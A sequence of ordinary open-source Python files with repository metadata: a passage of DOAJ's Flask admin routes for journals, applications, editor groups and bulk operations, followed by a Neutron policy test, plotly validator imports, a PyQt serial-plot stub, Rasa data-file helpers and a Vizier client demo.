return redirect(url_for('.journal_page', journal_id=journal_id, job=job.id))
@blueprint.route("/journal/<journal_id>/deactivate", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def journal_deactivate(journal_id):
job = journal_in_out_doaj.change_in_doaj([journal_id], False)
return redirect(url_for('.journal_page', journal_id=journal_id, job=job.id))
@blueprint.route("/journals/bulk/withdraw", methods=["POST"])
@login_required
@ssl_required
@write_required()
def journals_bulk_withdraw():
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query'], error_to_raise=BulkAdminEndpointException)
q = get_query_from_request(payload)
summary = journal_in_out_doaj.change_by_query(q, False, dry_run=payload.get("dry_run", True))
return make_json_resp(summary.as_dict(), status_code=200)
@blueprint.route("/journals/bulk/reinstate", methods=["POST"])
@login_required
@ssl_required
@write_required()
def journals_bulk_reinstate():
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query'], error_to_raise=BulkAdminEndpointException)
q = get_query_from_request(payload)
summary = journal_in_out_doaj.change_by_query(q, True, dry_run=payload.get("dry_run", True))
return make_json_resp(summary.as_dict(), status_code=200)
#
#####################################################################
@blueprint.route("/journal/<journal_id>/continue", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def journal_continue(journal_id):
j = models.Journal.pull(journal_id)
if j is None:
abort(404)
if request.method == "GET":
type = request.values.get("type")
form = MakeContinuation()
form.type.data = type
return render_template("admin/continuation.html", form=form, current=j)
elif request.method == "POST":
form = MakeContinuation(request.form)
if not form.validate():
return render_template('admin/continuation.html', form=form, current=j)
if form.type.data is None:
abort(400)
if form.type.data not in ["replaces", "is_replaced_by"]:
abort(400)
try:
cont = j.make_continuation(form.type.data, eissn=form.eissn.data, pissn=form.pissn.data, title=form.title.data)
except:
abort(400)
flash("The continuation has been created (see below). You may now edit the other metadata associated with it. The original journal has also been updated with this continuation's ISSN(s). Once you are happy with this record, you can publish it to the DOAJ", "success")
return redirect(url_for('.journal_page', journal_id=cont.id))
@blueprint.route("/applications", methods=["GET"])
@login_required
@ssl_required
def suggestions():
fc = ApplicationFormFactory.context("admin")
return render_template("admin/applications.html",
admin_page=True,
application_status_choices=application_statuses(None, fc))
@blueprint.route("/update_requests", methods=["GET"])
@login_required
@ssl_required
def update_requests():
fc = ApplicationFormFactory.context("admin")
return render_template("admin/update_requests.html",
admin_page=True,
application_status_choices=application_statuses(None, fc))
@blueprint.route("/application/<application_id>", methods=["GET", "POST"])
@write_required()
@login_required
@ssl_required
def application(application_id):
auth_svc = DOAJ.authorisationService()
application_svc = DOAJ.applicationService()
ap, _ = application_svc.application(application_id)
if ap is None:
abort(404)
try:
auth_svc.can_edit_application(current_user._get_current_object(), ap)
except exceptions.AuthoriseException:
abort(401)
try:
lockinfo = lock.lock(constants.LOCK_APPLICATION, application_id, current_user.id)
except lock.Locked as l:
return render_template("admin/application_locked.html", application=ap, lock=l.lock)
fc = ApplicationFormFactory.context("admin")
form_diff, current_journal = ApplicationFormXWalk.update_request_diff(ap)
if request.method == "GET":
fc.processor(source=ap)
return fc.render_template(obj=ap, lock=lockinfo, form_diff=form_diff,
current_journal=current_journal, lcc_tree=lcc_jstree)
elif request.method == "POST":
processor = fc.processor(formdata=request.form, source=ap)
if processor.validate():
try:
processor.finalise(current_user._get_current_object())
# if (processor.form.resettedFields):
# text = "Some fields has been resetted due to invalid value:"
# for f in processor.form.resettedFields:
# text += "<br>field: {}, invalid value: {}, new value: {}".format(f["name"], f["data"], f["default"])
# flash(text, 'info')
flash('Application updated.', 'success')
for a in processor.alert:
flash_with_url(a, "success")
return redirect(url_for("admin.application", application_id=ap.id, _anchor='done'))
except Exception as e:
flash(str(e))
return redirect(url_for("admin.application", application_id=ap.id, _anchor='cannot_edit'))
else:
return fc.render_template(obj=ap, lock=lockinfo, form_diff=form_diff, current_journal=current_journal, lcc_tree=lcc_jstree)
@blueprint.route("/application_quick_reject/<application_id>", methods=["POST"])
@login_required
@ssl_required
@write_required()
def application_quick_reject(application_id):
# extract the note information from the request
canned_reason = request.values.get("quick_reject", "")
additional_info = request.values.get("quick_reject_details", "")
reasons = []
if canned_reason != "":
reasons.append(canned_reason)
if additional_info != "":
reasons.append(additional_info)
if len(reasons) == 0:
abort(400)
reason = " - ".join(reasons)
note = Messages.REJECT_NOTE_WRAPPER.format(editor=current_user.id, note=reason)
applicationService = DOAJ.applicationService()
# retrieve the application and an edit lock on that application
application = None
try:
application, alock = applicationService.application(application_id, lock_application=True, lock_account=current_user._get_current_object())
except lock.Locked as e:
abort(409)
# determine if this was a new application or an update request
update_request = application.current_journal is not None
if update_request:
abort(400)
if application.owner is None:
Messages.flash_with_url(Messages.ADMIN__QUICK_REJECT__NO_OWNER, "error")
# redirect the user back to the edit page
return redirect(url_for('.application', application_id=application_id))
# reject the application
old_status = application.application_status
applicationService.reject_application(application, current_user._get_current_object(), note=note)
# send the notification email to the user
if old_status != constants.APPLICATION_STATUS_REJECTED:
eventsSvc = DOAJ.eventsService()
eventsSvc.trigger(models.Event(constants.EVENT_APPLICATION_STATUS, current_user.id, {
"application": application.data,
"old_status": old_status,
"new_status": constants.APPLICATION_STATUS_REJECTED,
"process": constants.PROCESS__QUICK_REJECT,
"note": reason
}))
# sort out some flash messages for the user
flash(note, "success")
msg = Messages.SENT_REJECTED_APPLICATION_EMAIL_TO_OWNER.format(user=application.owner)
flash(msg, "success")
# redirect the user back to the edit page
return redirect(url_for('.application', application_id=application_id))
@blueprint.route("/admin_site_search", methods=["GET"])
@login_required
@ssl_required
def admin_site_search():
#edit_formcontext = formcontext.ManEdBulkEdit()
#edit_form = edit_formcontext.render_template()
edit_formulaic_context = JournalFormFactory.context("bulk_edit")
edit_form = edit_formulaic_context.render_template()
return render_template("admin/admin_site_search.html",
admin_page=True,
edit_form=edit_form)
@blueprint.route("/editor_groups")
@login_required
@ssl_required
def editor_group_search():
return render_template("admin/editor_group_search.html", admin_page=True)
@blueprint.route("/background_jobs")
@login_required
@ssl_required
def background_jobs_search():
return render_template("admin/background_jobs_search.html", admin_page=True)
@blueprint.route("/editor_group", methods=["GET", "POST"])
@blueprint.route("/editor_group/<group_id>", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def editor_group(group_id=None):
if not current_user.has_role("modify_editor_groups"):
abort(401)
# ~~->EditorGroup:Form~~
if request.method == "GET":
form = EditorGroupForm()
if group_id is not None:
eg = models.EditorGroup.pull(group_id)
form.group_id.data = eg.id
form.name.data = eg.name
form.maned.data = eg.maned
form.editor.data = eg.editor
form.associates.data = ",".join(eg.associates)
return render_template("admin/editor_group.html", admin_page=True, form=form)
elif request.method == "POST":
if request.values.get("delete", "false") == "true":
# we have been asked to delete the id
if group_id is None:
# we can only delete things that exist
abort(400)
eg = models.EditorGroup.pull(group_id)
if eg is None:
abort(404)
eg.delete()
# return a json response
resp = make_response(json.dumps({"success" : True}))
resp.mimetype = "application/json"
return resp
# otherwise, we want to edit the content of the form or the object
form = EditorGroupForm(request.form)
if form.validate():
# get the group id from the url or from the request parameters
if group_id is None:
group_id = request.values.get("group_id")
group_id = group_id if group_id != "" else None
# if we have a group id, this is an edit, so get the existing group
if group_id is not None:
eg = models.EditorGroup.pull(group_id)
if eg is None:
abort(404)
else:
eg = models.EditorGroup()
associates = form.associates.data
if associates is not None:
associates = [a.strip() for a in associates.split(",") if a.strip() != ""]
# prep the user accounts with the correct role(s)
ed = models.Account.pull(form.editor.data)
ed.add_role("editor")
ed.save()
if associates is not None:
for a in associates:
ae = models.Account.pull(a)
if ae is not None: # If the account has been deleted, pull fails
ae.add_role("associate_editor")
ae.save()
eg.set_name(form.name.data)
eg.set_maned(form.maned.data)
eg.set_editor(form.editor.data)
if associates is not None:
eg.set_associates(associates)
eg.save()
flash("Group was updated - changes may not be reflected below immediately. Reload the page to see the update.", "success")
return redirect(url_for('admin.editor_group_search'))
else:
return render_template("admin/editor_group.html", admin_page=True, form=form)
@blueprint.route("/autocomplete/user")
@login_required
@ssl_required
def user_autocomplete():
q = request.values.get("q")
s = request.values.get("s", 10)
ac = models.Account.autocomplete("id", q, size=s)
# return a json response
resp = make_response(json.dumps(ac))
resp.mimetype = "application/json"
return resp
# Route which returns the associate editor account names within a given editor group
@blueprint.route("/dropdown/eg_associates")
@login_required
@ssl_required
def eg_associates_dropdown():
egn = request.values.get("egn")
eg = models.EditorGroup.pull_by_key("name", egn)
if eg is not None:
editors = [eg.editor]
editors += eg.associates
editors = list(set(editors))
else:
editors = None
# return a json response
resp = make_response(json.dumps(editors))
resp.mimetype = "application/json"
return resp
####################################################
## endpoints for bulk edit
class BulkAdminEndpointException(Exception):
pass
@app.errorhandler(BulkAdminEndpointException)
def bulk_admin_endpoints_bad_request(exception):
r = {}
r['error'] = exception.message
return make_json_resp(r, status_code=400)
def get_bulk_edit_background_task_manager(doaj_type):
if doaj_type == 'journals':
return journal_bulk_edit.journal_manage
elif doaj_type in ['applications', 'update_requests']:
return suggestion_bulk_edit.suggestion_manage
else:
raise BulkAdminEndpointException('Unsupported DOAJ type - you can currently only bulk edit journals and applications/update_requests.')
def get_query_from_request(payload, doaj_type=None):
q = payload['selection_query']
q = remove_search_limits(q)
q = Query(q)
if doaj_type == "update_requests":
update_request(q)
elif doaj_type == "applications":
not_update_request(q)
return q.as_dict()
@blueprint.route("/<doaj_type>/bulk/assign_editor_group", methods=["POST"])
@login_required
@ssl_required
@write_required()
def bulk_assign_editor_group(doaj_type):
task = get_bulk_edit_background_task_manager(doaj_type)
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query', 'editor_group'], error_to_raise=BulkAdminEndpointException)
summary = task(
selection_query=get_query_from_request(payload, doaj_type),
editor_group=payload['editor_group'],
dry_run=payload.get('dry_run', True)
)
return make_json_resp(summary.as_dict(), status_code=200)
@blueprint.route("/<doaj_type>/bulk/add_note", methods=["POST"])
@login_required
@ssl_required
@write_required()
def bulk_add_note(doaj_type):
task = get_bulk_edit_background_task_manager(doaj_type)
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query', 'note'], error_to_raise=BulkAdminEndpointException)
summary = task(
selection_query=get_query_from_request(payload, doaj_type),
note=payload['note'],
dry_run=payload.get('dry_run', True)
)
return make_json_resp(summary.as_dict(), status_code=200)
@blueprint.route("/journals/bulk/edit_metadata", methods=["POST"])
@login_required
@ssl_required
@write_required()
def bulk_edit_journal_metadata():
task = get_bulk_edit_background_task_manager("journals")
payload = get_web_json_payload()
if not "metadata" in payload:
raise BulkAdminEndpointException("key 'metadata' not present in request json")
formdata = MultiDict(payload["metadata"])
formulaic_context = JournalFormFactory.context("bulk_edit")
fc = formulaic_context.processor(formdata=formdata)
if not fc.validate():
msg = "Unable to submit your request due to form validation issues: "
for field in fc.form:
if field.errors:
msg += field.label.text + " - " + ",".join(field.errors)
summary = BackgroundSummary(None, error=msg)
else:
summary = task(
selection_query=get_query_from_request(payload),
dry_run=payload.get('dry_run', True),
**payload["metadata"]
)
return make_json_resp(summary.as_dict(), status_code=200)
@blueprint.route("/<doaj_type>/bulk/change_status", methods=["POST"])
@login_required
@ssl_required
@write_required()
def applications_bulk_change_status(doaj_type):
if doaj_type not in ["applications", "update_requests"]:
abort(403)
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query', 'application_status'], error_to_raise=BulkAdminEndpointException)
q = get_query_from_request(payload, doaj_type)
summary = get_bulk_edit_background_task_manager('applications')(
selection_query=q,
application_status=payload['application_status'],
dry_run=payload.get('dry_run', True)
)
return make_json_resp(summary.as_dict(), status_code=200)
@blueprint.route("/journals/bulk/delete", methods=['POST'])
@write_required()
def bulk_journals_delete():
if not current_user.has_role("ultra_bulk_delete"):
abort(403)
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query'], error_to_raise=BulkAdminEndpointException)
q = get_query_from_request(payload)
summary = journal_bulk_delete.journal_bulk_delete_manage(
selection_query=q,
dry_run=payload.get('dry_run', True)
)
return make_json_resp(summary.as_dict(), status_code=200)
@blueprint.route("/articles/bulk/delete", methods=['POST'])
@write_required()
def bulk_articles_delete():
if not current_user.has_role("ultra_bulk_delete"):
abort(403)
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query'], error_to_raise=BulkAdminEndpointException)
q = get_query_from_request(payload)
summary = article_bulk_delete.article_bulk_delete_manage(
selection_query=q,
dry_run=payload.get('dry_run', True)
)
return make_json_resp(summary.as_dict(), status_code=200)
################################################# | {
"content_hash": "11d87b09a351429e2c016ce620008c82",
"timestamp": "",
"source": "github",
"line_count": 760,
"max_line_length": 278,
"avg_line_length": 35.71578947368421,
"alnum_prop": 0.6473253757736517,
"repo_name": "DOAJ/doaj",
"id": "5e02c11ccd8f6e16513387b91e180c80e19cc515",
"size": "27144",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "portality/view/admin.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "2399"
},
{
"name": "Dockerfile",
"bytes": "59"
},
{
"name": "HTML",
"bytes": "483733"
},
{
"name": "JavaScript",
"bytes": "952971"
},
{
"name": "Jinja",
"bytes": "15292"
},
{
"name": "Python",
"bytes": "3195030"
},
{
"name": "SCSS",
"bytes": "75276"
},
{
"name": "Shell",
"bytes": "28415"
}
],
"symlink_target": ""
} |
import os.path
from neutron_lib.api import attributes
from neutron_lib import context
from neutron_lib import fixture
from neutron.api import extensions
from neutron import policy
from neutron.tests import base
TEST_PATH = os.path.dirname(os.path.abspath(__file__))
class APIPolicyTestCase(base.BaseTestCase):
"""
Tests for REST API policy checks. Ideally this would be done against an
environment with an instantiated plugin, but there appears to be problems
with instantiating a plugin against an sqlite environment and as yet, there
is no precedent for running a functional test against an actual database
backend.
"""
api_version = "2.0"
def setUp(self):
super(APIPolicyTestCase, self).setUp()
self.useFixture(fixture.APIDefinitionFixture())
self.extension_path = os.path.abspath(os.path.join(
TEST_PATH, "../../../extensions"))
self.addCleanup(policy.reset)
def _network_definition(self):
return {'name': 'test_network',
'ports': [],
'subnets': [],
'status': 'up',
'admin_state_up': True,
'shared': False,
'tenant_id': 'admin',
'id': 'test_network',
'router:external': True}
def _check_external_router_policy(self, context):
return policy.check(context, 'get_network', self._network_definition())
def test_premature_loading(self):
"""
Verifies that loading policies by way of admin context before
populating extensions and extending the resource map results in
networks with router:external is true being invisible to regular
tenants.
"""
extension_manager = extensions.ExtensionManager(self.extension_path)
admin_context = context.get_admin_context()
tenant_context = context.Context('test_user', 'test_tenant_id', False)
extension_manager.extend_resources(self.api_version,
attributes.RESOURCES)
self.assertTrue(self._check_external_router_policy(admin_context))
self.assertFalse(self._check_external_router_policy(tenant_context))
def test_proper_load_order(self):
"""
Verifies that loading policies by way of admin context after
populating extensions and extending the resource map results in
networks with router:external are visible to regular tenants.
"""
policy.reset()
extension_manager = extensions.ExtensionManager(self.extension_path)
extension_manager.extend_resources(self.api_version,
attributes.RESOURCES)
policy.init()
admin_context = context.get_admin_context()
tenant_context = context.Context('test_user', 'test_tenant_id', False)
self.assertTrue(self._check_external_router_policy(admin_context))
self.assertTrue(self._check_external_router_policy(tenant_context))
| {
"content_hash": "e0154389717597531b26247f8d28fff5",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 79,
"avg_line_length": 40.373333333333335,
"alnum_prop": 0.6459709379128138,
"repo_name": "huntxu/neutron",
"id": "6b8b2d58e31ef1b83043ab7ad630dc7813ba02b9",
"size": "3661",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "neutron/tests/functional/api/test_policies.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "1047"
},
{
"name": "Python",
"bytes": "11111676"
},
{
"name": "Shell",
"bytes": "37514"
}
],
"symlink_target": ""
} |
import sys
from typing import TYPE_CHECKING
if sys.version_info < (3, 7) or TYPE_CHECKING:
from ._zsrc import ZsrcValidator
from ._zmin import ZminValidator
from ._zmid import ZmidValidator
from ._zmax import ZmaxValidator
from ._zauto import ZautoValidator
from ._z import ZValidator
from ._visible import VisibleValidator
from ._unselected import UnselectedValidator
from ._uirevision import UirevisionValidator
from ._uid import UidValidator
from ._textsrc import TextsrcValidator
from ._text import TextValidator
from ._subplot import SubplotValidator
from ._stream import StreamValidator
from ._showscale import ShowscaleValidator
from ._showlegend import ShowlegendValidator
from ._selectedpoints import SelectedpointsValidator
from ._selected import SelectedValidator
from ._reversescale import ReversescaleValidator
from ._name import NameValidator
from ._metasrc import MetasrcValidator
from ._meta import MetaValidator
from ._marker import MarkerValidator
from ._locationssrc import LocationssrcValidator
from ._locations import LocationsValidator
from ._legendwidth import LegendwidthValidator
from ._legendrank import LegendrankValidator
from ._legendgrouptitle import LegendgrouptitleValidator
from ._legendgroup import LegendgroupValidator
from ._idssrc import IdssrcValidator
from ._ids import IdsValidator
from ._hovertextsrc import HovertextsrcValidator
from ._hovertext import HovertextValidator
from ._hovertemplatesrc import HovertemplatesrcValidator
from ._hovertemplate import HovertemplateValidator
from ._hoverlabel import HoverlabelValidator
from ._hoverinfosrc import HoverinfosrcValidator
from ._hoverinfo import HoverinfoValidator
from ._geojson import GeojsonValidator
from ._featureidkey import FeatureidkeyValidator
from ._customdatasrc import CustomdatasrcValidator
from ._customdata import CustomdataValidator
from ._colorscale import ColorscaleValidator
from ._colorbar import ColorbarValidator
from ._coloraxis import ColoraxisValidator
from ._below import BelowValidator
from ._autocolorscale import AutocolorscaleValidator
else:
from _plotly_utils.importers import relative_import
__all__, __getattr__, __dir__ = relative_import(
__name__,
[],
[
"._zsrc.ZsrcValidator",
"._zmin.ZminValidator",
"._zmid.ZmidValidator",
"._zmax.ZmaxValidator",
"._zauto.ZautoValidator",
"._z.ZValidator",
"._visible.VisibleValidator",
"._unselected.UnselectedValidator",
"._uirevision.UirevisionValidator",
"._uid.UidValidator",
"._textsrc.TextsrcValidator",
"._text.TextValidator",
"._subplot.SubplotValidator",
"._stream.StreamValidator",
"._showscale.ShowscaleValidator",
"._showlegend.ShowlegendValidator",
"._selectedpoints.SelectedpointsValidator",
"._selected.SelectedValidator",
"._reversescale.ReversescaleValidator",
"._name.NameValidator",
"._metasrc.MetasrcValidator",
"._meta.MetaValidator",
"._marker.MarkerValidator",
"._locationssrc.LocationssrcValidator",
"._locations.LocationsValidator",
"._legendwidth.LegendwidthValidator",
"._legendrank.LegendrankValidator",
"._legendgrouptitle.LegendgrouptitleValidator",
"._legendgroup.LegendgroupValidator",
"._idssrc.IdssrcValidator",
"._ids.IdsValidator",
"._hovertextsrc.HovertextsrcValidator",
"._hovertext.HovertextValidator",
"._hovertemplatesrc.HovertemplatesrcValidator",
"._hovertemplate.HovertemplateValidator",
"._hoverlabel.HoverlabelValidator",
"._hoverinfosrc.HoverinfosrcValidator",
"._hoverinfo.HoverinfoValidator",
"._geojson.GeojsonValidator",
"._featureidkey.FeatureidkeyValidator",
"._customdatasrc.CustomdatasrcValidator",
"._customdata.CustomdataValidator",
"._colorscale.ColorscaleValidator",
"._colorbar.ColorbarValidator",
"._coloraxis.ColoraxisValidator",
"._below.BelowValidator",
"._autocolorscale.AutocolorscaleValidator",
],
)
| {
"content_hash": "ad4985dbe2b0fa85e0cfd324f5e5053a",
"timestamp": "",
"source": "github",
"line_count": 107,
"max_line_length": 60,
"avg_line_length": 42.35514018691589,
"alnum_prop": 0.6734333627537511,
"repo_name": "plotly/plotly.py",
"id": "6bf73df4f7e3e402a95193794e554f7abe6116e3",
"size": "4532",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/choroplethmapbox/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "545"
},
{
"name": "JavaScript",
"bytes": "2074"
},
{
"name": "PostScript",
"bytes": "565328"
},
{
"name": "Python",
"bytes": "31506317"
},
{
"name": "TypeScript",
"bytes": "71337"
}
],
"symlink_target": ""
} |
from pyqtgraph.Qt import QtCore
import pyqtgraph as pg
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
import sys
import serial
pg.setConfigOptions(antialias=True)
class SerialPort:
""" Serial Port Widget """
def __init__(self,layout):
if not isinstance(layout,pg.LayoutWidget):
raise ValueError("layout must be QGridLayout")
self.layout = layout
self.layout.addLabel("Port")
if __name__ == "__main__":
class MainWindow(QMainWindow):
def __init__(self,*args,**kwargs):
super(MainWindow,self).__init__(*args,**kwargs)
self.setWindowTitle("Main Test Window")
layout = pg.LayoutWidget()
#layout.addLabel("Test",0,0)
self.SerialPort = SerialPort(layout)
#layout.addWidget(self.SerialPort)
widget = QWidget()
widget.setLayout(layout)
self.setCentralWidget(widget)
self.setGeometry(200,200,300,300)
self.SerialPort.set_timer()
app = QApplication(sys.argv)
#window = SensorType()
window = MainWindow()
window.show()
app.exec_() | {
"content_hash": "79ef23a61e44b1f7566e30831dd45251",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 59,
"avg_line_length": 21.76271186440678,
"alnum_prop": 0.5630841121495327,
"repo_name": "MCasari-PMEL/EDD-ICMGUI",
"id": "8cff230e6776ebf6129cc948a120f0605801821f",
"size": "1284",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/serplot.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "80531"
}
],
"symlink_target": ""
} |
import os
import shutil
import tempfile
import uuid
from pathlib import Path
from typing import Text, Optional, Union, List, Callable, Set, Iterable
YAML_FILE_EXTENSIONS = [".yml", ".yaml"]
JSON_FILE_EXTENSIONS = [".json"]
TRAINING_DATA_EXTENSIONS = set(JSON_FILE_EXTENSIONS + YAML_FILE_EXTENSIONS)
def yaml_file_extension() -> Text:
"""Return YAML file extension."""
return YAML_FILE_EXTENSIONS[0]
def is_likely_yaml_file(file_path: Union[Text, Path]) -> bool:
"""Check if a file likely contains yaml.
Arguments:
file_path: path to the file
Returns:
`True` if the file likely contains data in yaml format, `False` otherwise.
"""
return Path(file_path).suffix in set(YAML_FILE_EXTENSIONS)
def is_likely_json_file(file_path: Text) -> bool:
"""Check if a file likely contains json.
Arguments:
file_path: path to the file
Returns:
`True` if the file likely contains data in json format, `False` otherwise.
"""
return Path(file_path).suffix in set(JSON_FILE_EXTENSIONS)
def get_core_directory(paths: Optional[Union[Text, List[Text]]]) -> Text:
"""Recursively collects all Core training files from a list of paths.
Args:
paths: List of paths to training files or folders containing them.
Returns:
Path to temporary directory containing all found Core training files.
"""
from rasa.shared.core.training_data.story_reader.yaml_story_reader import (
YAMLStoryReader,
)
core_files = get_data_files(paths, YAMLStoryReader.is_stories_file)
return _copy_files_to_new_dir(core_files)
def get_nlu_directory(paths: Optional[Union[Text, List[Text]]],) -> Text:
"""Recursively collects all NLU training files from a list of paths.
Args:
paths: List of paths to training files or folders containing them.
Returns:
Path to temporary directory containing all found NLU training files.
"""
nlu_files = get_data_files(paths, is_nlu_file)
return _copy_files_to_new_dir(nlu_files)
def get_data_files(
paths: Optional[Union[Text, List[Text]]], filter_predicate: Callable[[Text], bool]
) -> List[Text]:
"""Recursively collects all training files from a list of paths.
Args:
paths: List of paths to training files or folders containing them.
filter_predicate: property to use when filtering the paths, e.g. `is_nlu_file`.
Returns:
Paths of training data files.
"""
data_files = set()
if paths is None:
paths = []
elif isinstance(paths, str):
paths = [paths]
for path in set(paths):
if not path:
continue
if is_valid_filetype(path):
if filter_predicate(path):
data_files.add(os.path.abspath(path))
else:
new_data_files = _find_data_files_in_directory(path, filter_predicate)
data_files.update(new_data_files)
return sorted(data_files)
def _find_data_files_in_directory(
directory: Text, filter_property: Callable[[Text], bool]
) -> Set[Text]:
filtered_files = set()
for root, _, files in os.walk(directory, followlinks=True):
# we sort the files here to ensure consistent order for repeatable training
# results
for f in sorted(files):
full_path = os.path.join(root, f)
if not is_valid_filetype(full_path):
continue
if filter_property(full_path):
filtered_files.add(full_path)
return filtered_files
def is_valid_filetype(path: Union[Path, Text]) -> bool:
"""Checks if given file has a supported extension.
Args:
path: Path to the source file.
Returns:
`True` is given file has supported extension, `False` otherwise.
"""
return Path(path).is_file() and Path(path).suffix in TRAINING_DATA_EXTENSIONS
def is_nlu_file(file_path: Text) -> bool:
"""Checks if a file is a Rasa compatible nlu file.
Args:
file_path: Path of the file which should be checked.
Returns:
`True` if it's a nlu file, otherwise `False`.
"""
from rasa.shared.nlu.training_data import loading as nlu_loading
return nlu_loading.guess_format(file_path) != nlu_loading.UNK
def is_config_file(file_path: Text) -> bool:
"""Checks whether the given file path is a Rasa config file.
Args:
file_path: Path of the file which should be checked.
Returns:
`True` if it's a Rasa config file, otherwise `False`.
"""
file_name = os.path.basename(file_path)
return file_name in ["config.yml", "config.yaml"]
def _copy_files_to_new_dir(files: Iterable[Text]) -> Text:
directory = tempfile.mkdtemp()
for f in files:
# makes sure files do not overwrite each other, hence the prefix
unique_prefix = uuid.uuid4().hex
unique_file_name = unique_prefix + "_" + os.path.basename(f)
shutil.copy2(f, os.path.join(directory, unique_file_name))
return directory
| {
"content_hash": "56e082ee79929999d2857f2cb2082bb6",
"timestamp": "",
"source": "github",
"line_count": 174,
"max_line_length": 87,
"avg_line_length": 28.942528735632184,
"alnum_prop": 0.6503177124702144,
"repo_name": "RasaHQ/rasa_nlu",
"id": "ffabb6923725d28ad8ee22e06bfb24258fb68338",
"size": "5036",
"binary": false,
"copies": "1",
"ref": "refs/heads/emptystring_10504",
"path": "rasa/shared/data.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "705"
},
{
"name": "HTML",
"bytes": "3462"
},
{
"name": "Makefile",
"bytes": "1044"
},
{
"name": "Python",
"bytes": "1467067"
},
{
"name": "Shell",
"bytes": "941"
}
],
"symlink_target": ""
} |
"""Example of a Vizier Client, which can be run on multiple machines.
For distributed cases, this is meant to be used after the Vizier Server (see
run_vizier_server.py`) has been launched and provided an address to connect to.
Example of a launch command:
```
python run_vizier_client.py --address="localhost:[PORT]"
```
where `address` was provided by the server.
If not provided, the Vizier Server will be created locally, which still allows
parallelization via multithreading, but will not be able to coordinate jobs
across different machines.
"""
from typing import Sequence
from absl import app
from absl import flags
from absl import logging
from vizier.service import clients
from vizier.service import pyvizier as vz
flags.DEFINE_string(
'address', clients.NO_ENDPOINT,
"Address of the Vizier Server which will be used by this demo. Should be of the form e.g. 'localhost:6006' if running on the same machine, or `[IP]:[PORT]` if running on a remote machine. If unset, a local Vizier server will be created inside this process."
)
flags.DEFINE_integer(
'max_num_iterations', 10,
'Maximum number of possible iterations / calls to get suggestions.')
flags.DEFINE_integer(
'suggestion_count', 5,
'Number of suggestions to evaluate per iteration. Useful for batched evaluations.'
)
flags.DEFINE_boolean(
'multiobjective', True,
'Whether to demonstrate multiobjective or single-objective capabilities and API.'
)
FLAGS = flags.FLAGS
def evaluate_trial(trial: vz.Trial) -> vz.Measurement:
"""Dummy evaluator used as an example."""
learning_rate = trial.parameters.get_value('learning_rate')
num_layers = trial.parameters.get_value('num_layers')
m = vz.Measurement()
m.metrics = {'accuracy': learning_rate * num_layers} # dummy accuracy
if FLAGS.multiobjective:
m.metrics['latency'] = 0.5 * num_layers
return m
def main(argv: Sequence[str]) -> None:
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
if FLAGS.address == clients.NO_ENDPOINT:
logging.info(
'You did not specify the server address. The Vizier Service will be created locally.'
)
else:
# Set address.
clients.environment_variables.service_endpoint = FLAGS.address
study_config = vz.StudyConfig() # Search space, metrics, and algorithm.
root = study_config.search_space.root
root.add_float_param(
'learning_rate',
min_value=1e-4,
max_value=1e-2,
scale_type=vz.ScaleType.LOG)
root.add_int_param('num_layers', min_value=1, max_value=5)
study_config.metric_information.append(
vz.MetricInformation(
name='accuracy',
goal=vz.ObjectiveMetricGoal.MAXIMIZE,
min_value=0.0,
max_value=1.0))
if FLAGS.multiobjective:
# No need to specify min/max values.
study_config.metric_information.append(
vz.MetricInformation(
name='latency', goal=vz.ObjectiveMetricGoal.MINIMIZE))
if FLAGS.multiobjective:
study_config.algorithm = vz.Algorithm.NSGA2
else:
study_config.algorithm = vz.Algorithm.EMUKIT_GP_EI
study = clients.Study.from_study_config(
study_config, owner='my_name', study_id='cifar10')
logging.info('Client created with study name: %s', study.resource_name)
for _ in range(FLAGS.max_num_iterations):
# Evaluate the suggestion(s) and report the results to Vizier.
trials = study.suggest(count=FLAGS.suggestion_count)
for trial in trials:
materialized_trial = trial.materialize()
measurement = evaluate_trial(materialized_trial)
trial.complete(measurement)
logging.info('Trial %d completed with metrics: %s', trial.id,
measurement.metrics)
optimal_trials = study.optimal_trials()
for optimal_trial in optimal_trials:
optimal_trial = optimal_trial.materialize(include_all_measurements=True)
logging.info(
'Pareto-optimal trial found so far has parameters %s and metrics %s',
optimal_trial.parameters, optimal_trial.final_measurement.metrics)
if __name__ == '__main__':
app.run(main)
| {
"content_hash": "bd28e8ee14ff6ccc7f6f89709d8ceadc",
"timestamp": "",
"source": "github",
"line_count": 118,
"max_line_length": 261,
"avg_line_length": 34.63559322033898,
"alnum_prop": 0.7112796672375826,
"repo_name": "google/vizier",
"id": "747bfe3c819e4c0205adbabaf6e7ba59eb31efac",
"size": "4663",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "demos/run_vizier_client.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1282546"
},
{
"name": "Shell",
"bytes": "2440"
}
],
"symlink_target": ""
} |
Subsets and Splits